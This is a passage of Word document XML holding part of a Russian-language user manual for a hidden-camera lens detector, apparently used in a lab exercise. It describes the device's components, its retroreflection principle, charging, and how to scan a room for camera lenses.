      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="4294967294" distB="4294967294" distL="114300" distR="114300" simplePos="0" relativeHeight="251641344" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2788920</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>765174</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="528955" cy="0"/>
                <wp:effectExtent l="0" t="0" r="4445" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="19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89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3A71B1" id="Прямая соединительная линия 20" o:spid="_x0000_s1026" style="position:absolute;z-index:251641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9.6pt,60.25pt" to="261.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">
                <o:lock v:ext="edit" shapetype="f"/>
              </v:lin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1359535</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>770890</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="612775" cy="776605"/>
                <wp:effectExtent l="0" t="0" r="15875" b="4445"/>
                <wp:wrapNone/>
                <wp:docPr id="18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775" cy="7766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2B8621" id="Прямая соединительная линия 19" o:spid="_x0000_s1026" style="position:absolute;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05pt,60.7pt" to="155.3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">
                <o:lock v:ext="edit" shapetype="f"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="4294967294" distB="4294967294" distL="114300" distR="114300" simplePos="0" relativeHeight="251643392" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1359535</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>770889</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1289685" cy="0"/>
                <wp:effectExtent l="0" t="0" r="5715" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="18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9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56E1F8" id="Прямая соединительная линия 18" o:spid="_x0000_s1026" style="position:absolute;z-index:25164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7.05pt,60.7pt" to="208.6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">
                <o:lock v:ext="edit" shapetype="f"/>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3014980</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>365125</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1162050" cy="1003300"/>
                <wp:effectExtent l="0" t="0" r="0" b="6350"/>
                <wp:wrapNone/>
                <wp:docPr id="18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2050" cy="1003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0E7F49" id="Прямая соединительная линия 17" o:spid="_x0000_s1026" style="position:absolute;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pt,28.75pt" to="328.9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">
                <o:lock v:ext="edit" shapetype="f"/>
              </v:lin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3886200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>352425</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="854075" cy="381000"/>
                <wp:effectExtent l="0" t="0" r="3175" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="186"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4075" cy="381000"/>
                        </a:xfrm>
                        <a:prstGeom prst="line">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:round/>
                          <a:headEnd type="none" w="sm"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CE9D251" id="Прямая соединительная линия 15" o:spid="_x0000_s1026" style="position:absolute;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27.75pt" to="373.2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">
                <v:stroke startarrowwidth="narrow"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="4294967294" distB="4294967294" distL="114300" distR="114300" simplePos="0" relativeHeight="251646464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3507740</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>352424</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="378460" cy="0"/>
                <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="185"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84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4101E6" id="Прямая соединительная линия 16" o:spid="_x0000_s1026" style="position:absolute;flip:x;z-index:25164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6.2pt,27.75pt" to="30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">
                <o:lock v:ext="edit" shapetype="f"/>
              </v:lin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1821815</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2771775</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="641350" cy="1574800"/>
                <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
                <wp:wrapNone/>
                <wp:docPr id="18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0" cy="157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1025D1" id="_x0000_t32" coordsize="21600,21600" o:spt="32" o:oned="t" path="m,l21600,21600e" filled="f">
                <v:path arrowok="t" fillok="f" o:connecttype="none"/>
                <o:lock v:ext="edit" shapetype="t"/>
              </v:shapetype>
              <v:shape id="Прямая со стрелкой 14" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:143.45pt;margin-top:218.25pt;width:50.5pt;height:124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"/>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1821815</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2710815</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="786765" cy="1629410"/>
                <wp:effectExtent l="0" t="0" r="13335" b="8890"/>
                <wp:wrapNone/>
                <wp:docPr id="18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765" cy="162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8CBCA" id="Прямая со стрелкой 13" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:143.45pt;margin-top:213.45pt;width:61.95pt;height:128.3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"/>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1821815</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2649855</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="911225" cy="1690370"/>
                <wp:effectExtent l="0" t="0" r="3175" b="5080"/>
                <wp:wrapNone/>
                <wp:docPr id="18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1225" cy="169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79253" id="Прямая со стрелкой 12" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:143.45pt;margin-top:208.65pt;width:71.75pt;height:133.1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"/>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1821815</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2574925</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1043305" cy="1758950"/>
                <wp:effectExtent l="0" t="0" r="4445" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="18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3305" cy="1758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CEE22" id="Прямая со стрелкой 11" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:143.45pt;margin-top:202.75pt;width:82.15pt;height:138.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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="4294967295" distB="4294967295" distL="114300" distR="114300" simplePos="0" relativeHeight="251651584" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-4550410</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4417059</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3049270" cy="0"/>
                <wp:effectExtent l="0" t="0" r="17780" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="18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9EF8E" id="Прямая со стрелкой 10" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:-358.3pt;margin-top:347.8pt;width:240.1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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>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r w:rsidRPr="007C6975">
        <w:t>Рисунок 2 – расположение основных частей изделия</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t>Изделие состоит из корпуса, изготовленного из ударопрочного пластика ABS с расположенными в нем:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>- объективом;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>- светодиодным излучателем (8 светодиодов, расположенных вокруг объектива);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>- индикатором зарядки и режимов работы (5 зеленых светодиодов на задней панели изделия);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>- гнездом для подключения внешнего источника питания/зарядного устройства;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>- экраном;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>- кнопкой включения, выключения, переключения режимов работы;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C6975">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">- дополнительными светодиодами подсветки ближней зоны </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(4 зеленых светодиода на передней панели).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="006816EE" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="006816EE">
        <w:t>1.4  Устройство и работа</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">1.4.1 Принцип работы изделия заключается в эффекте обратного блика. Изделие излучает свет и принимает отраженное излучение </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(в том числе отраженные блики от объективов скрытых видеокамер)</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t>. Так как яркость отраженного луча от объектива видеокамеры в несколько раз выше, чем отражения от других предметов, то определить место расположения камеры достаточно просто.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>1.4.2 Изделие работает под управлением расположенного в корпусе микроконтроллера с установленным в нем программным обеспечением.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">1.4.3 Питание изделия осуществляется от аккумуляторной батареи  или от поставляемого в комплекте внешнего источника питания </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">(сетевого адаптера) </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">с выходным напряжением постоянного тока 5 В. Подключение внешнего источника питания осуществляется через гнездо </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(см. рисунок 2)</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t>.  Полярность гнезда показана на рисунке 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049237E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1478280" cy="304800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Рисунок 9" descr="Описание: цокол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цоколев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304800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C6975">
        <w:t>Рисунок 3 –  полярность гнезда для подключения внешнего источника питания.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>Примечание - аккумуляторная батарея рассчитана на весь срок службы изделия и не требует замены во время эксплуатации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="006816EE" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="006816EE">
        <w:t xml:space="preserve">2. ИСПОЛЬЗОВАНИЕ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="006816EE" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="006816EE">
        <w:t>2.1 Эксплуатационные ограничения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>2.1.1 Работающее изделие запрещается направлять в глаза себе или другому человеку.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>2.1.2 После хранения изделия в холодном помещении или транспортирования в зимних условиях перед началом эксплуатации его необходимо выдержать при комнатной температуре в течение двух часов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="006816EE">
        <w:t>2.2 Использование изделия</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="0049237E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2537460" cy="3817620"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Рисунок 50" descr="Описание: Светодиоды для индикации режимов работы и уровня заряда аккумулятора обнаруж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Светодиоды для индикации режимов работы и уровня заряда аккумулятора обнаружител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7460" cy="3817620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Segoe UI" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Светодиоды для индикации режимов работы и уровня заряда аккумулятора</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Segoe UI" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>обнаружителя</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="006816EE" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">Перед первым использованием </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">в лабораторной работе </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t>издели</w:t>
      </w:r>
      <w:r>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve"> необходимо полностью зарядить аккумуляторные батареи прибора с помощью сетевого адаптера, входящего в комплект поставки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.2.1 Для успешной работы с изделием следует знать, что обнаружение скрытых камер зависит от частоты генерируемых вспышек: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">Переключение режимов работы </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(частоты вспышек)</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve"> осуществляется коротким нажатием на кнопку, расположенную на задней панели изделия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>Следует выбрать такую частоту, при которой блики от вспышек наиболее заметны.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C6975">
        <w:t>Текущий режим отображается одним из светодиодов, расположенных рядом с кнопкой «ВКЛ/ВЫК» на задней панели изделия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve"> 2.2.2 При работе изделия аккумуляторы должны иметь достаточный заряд.  Е</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:lang w:val="x-none"/>
        </w:rPr>
        <w:t>сли во время работы заряд аккумулятора достиг</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">нет </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:lang w:val="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">минимального уровня, </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">то </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:lang w:val="x-none"/>
        </w:rPr>
        <w:t>светодиоды</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t>, расположенные</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:lang w:val="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> на задней</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve"> панели, вспыхивают</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:lang w:val="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> на короткое время</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:lang w:val="x-none"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve"> изделие вык</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:lang w:val="x-none"/>
        </w:rPr>
        <w:t>лючается.</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">  Чтобы продолжить работу, можно подключить внешний источник питания </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(сетевой адаптер)</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t>, который поставляется в комплекте с изделием.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">2.2.3 Внешний источник питания </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(сетевой адаптер)</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve"> используется также в качестве зарядного устройства. На первой стадии зарядки осуществляется заряд умеренным током (</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:i/>
          <w:lang w:val="x-none"/>
        </w:rPr>
        <w:t>быстро бегущий огонек</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> на индикаторе зарядки и режимов работы)</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">, на второй – ток уменьшается </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(медленно</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:i/>
          <w:lang w:val="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> бегущий огонек</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">По достижении полного заряда аккумуляторов контроллер изделия автоматически прекращает процесс зарядки. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>2.2.4 Хотя в</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:lang w:val="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> приборе использованы Ni</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:lang w:val="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">MH аккумуляторы, которые не имеют эффекта памяти </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">и которые </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:lang w:val="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">можно хранить в разряженном состоянии, </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t>для увеличения срока их службы рекомендуется производить зарядку аккумуляторов за один цикл, после их полного разряда.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">2.2.5 Изделие просто в эксплуатации и не требует владения специальными навыками. Изделие позволяет обнаружить объектив любой камеры </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>на расстоянии до 18 метров</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t>. Дальность обнаружения зависит от освещенности помещения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">2.2.6 Включение изделия осуществляется кнопкой, расположенной на задней панели изделия, посредством нажатия и удержания ее в нажатом состоянии </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>не менее 2 секунд</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">. После включения изделия светодиоды, расположенные вокруг объектива, начинают вспыхивать. Затем кратковременным нажатием на кнопку включения следует выбрать частоту вспышек светодиодов излучателя. В затемненном помещении рекомендуется выбирать самую низкую частоту вспышек, в светлом – более высокую. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">        После того как выбрана частота вспышек, через объектив нужно осмотреть предположительные места установки скрытых видеокамер (рекомендации по поиску Вы найдете в п. 2.3).  В месте, где установлена камера, Вы увидите яркие пульсирующие точки – это обратные блики от объектива видеокамеры (см. рис. 4). При обнаружении бликующего точечного пятна необходимо осмотреть это место с близкого расстояния и определить источник блика.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251653632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4590415</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>26035</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1910715" cy="1910715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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2347595</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>55880</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1888490" cy="1888490"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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849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133350</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>86360</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1858010" cy="1858010"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
